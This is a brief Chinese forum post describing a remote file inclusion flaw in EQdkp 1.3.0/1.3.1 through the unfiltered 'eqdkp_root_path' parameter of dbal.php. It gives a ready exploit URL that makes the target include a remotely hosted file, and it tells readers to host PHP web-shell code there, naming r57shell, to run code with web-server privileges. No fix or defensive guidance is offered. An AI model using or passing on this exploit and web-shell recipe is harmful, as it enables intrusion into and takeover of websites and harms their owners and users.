服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务
EQdkp 1.3.0/1.3.1版本
漏洞信息:简单的说远程攻击者可以利用漏洞以WEB进程权限执行任意PHP命令。具体情节是'dbal.php'脚本对用户提交的'eqdkp_root_path'参数缺少过滤指定远程服务器上的任意文件作为包含对象,可导致以WEB权限执行任意PHP代码利用方法:http://www.XXX.cn/includes/dbal.php?eqdkp_root_path=http://XXX.cn/logging.txt?
http://XXX.cn/logging.txt 是你网站是的PHP代码! 要是E文的! 比如r57shell
使用道具 举报
本版积分规则 发表回复 回帖后跳转到最后一页
|小黑屋|手机版|Archiver|运维之家
GMT+8, 2025-5-1 07:18 , Processed in 0.021512 second(s), 14 queries .
Powered by Dirtysea
© 2008-2020 Dirtysea.com.